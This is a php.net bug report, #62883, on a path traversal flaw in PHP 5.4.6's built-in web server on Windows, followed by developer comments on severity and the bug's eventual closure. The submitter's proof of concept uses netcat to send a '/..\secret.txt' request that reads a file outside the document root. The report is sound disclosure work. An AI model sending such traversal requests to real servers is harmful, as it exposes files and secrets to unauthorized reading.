php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #62883 PHP built-in web server - path traversal
Submitted: 2012-08-21 21:11 UTC Modified: 2018-05-14 00:20 UTC
From: krzotr at gmail dot com Assigned: mattficken (profile)
Status: Closed Package: Built-in web server
PHP Version: 5.4.6 OS: Windows XP
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: krzotr at gmail dot com
New email:
PHP Version: OS:

 

 [2012-08-21 21:11 UTC] krzotr at gmail dot com 
Description:
------------
PHP built-in web server able to read file outside web server root directory

Test script:
---------------
C:\>type secret.txt
My secret password: 0123456789
C:\php>php -S 127.0.0.1:8080
PHP 5.4.6 Development Server started at Tue Aug 21 22:55:38 2012
Listening on http://127.0.0.1:8080
Document root is C:\php
------------------------------------------------------------------------------
C:\Documents and Settings>nc 127.0.0.1 8080
GET /..\secret.txt

HTTP/0.9 200 OK
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 30

My secret password: 0123456789
------------------------------------------------------------------------------
Server log:
[Tue Aug 21 22:55:56 2012] 127.0.0.1:25202 [200]: /..\secret.txt

Expected result:
----------------
Invalid request

Actual result:
--------------
My secret password: 0123456789

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2012-09-23 15:12 UTC] laruence@php.net 
hmm, seems not reproduceable on linux, there maybe something wrong in the httpd 
parser while on windows.

anyway, built-in server targets at testing and deving purpose.  so, I think this 
is not that harmful :) 

thanks
 [2013-05-20 08:11 UTC] stas@php.net
-Assigned To: +Assigned To: moriyoshi
 [2017-10-24 06:33 UTC] kalle@php.net
-Status: Assigned +Status: Open -Assigned To: moriyoshi +Assigned To:
 [2018-03-10 13:42 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2018-03-10 13:42 UTC] cmb@php.net 
According to our security issue classification[1], this would not
be a security issue, since the built-in webserver is not meant to
be used on a public network.

[1] <https://wiki.php.net/security#not_a_security_issue>
 [2018-03-13 01:14 UTC] mattficken@php.net 
An issue like this should probably be fixed regardless of policy.

But, I can NOT repro this issue on 7.2.2 on Windows.

I believe this issue was fixed a while ago.

-Thoughts?

Otherwise, I will close this bug.
 [2018-05-14 00:20 UTC] mattficken@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: mattficken
 [2018-05-14 00:20 UTC] mattficken@php.net 
see previous comment
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved. 		Last updated: Fri Jul 04 17:01:35 2025 UTC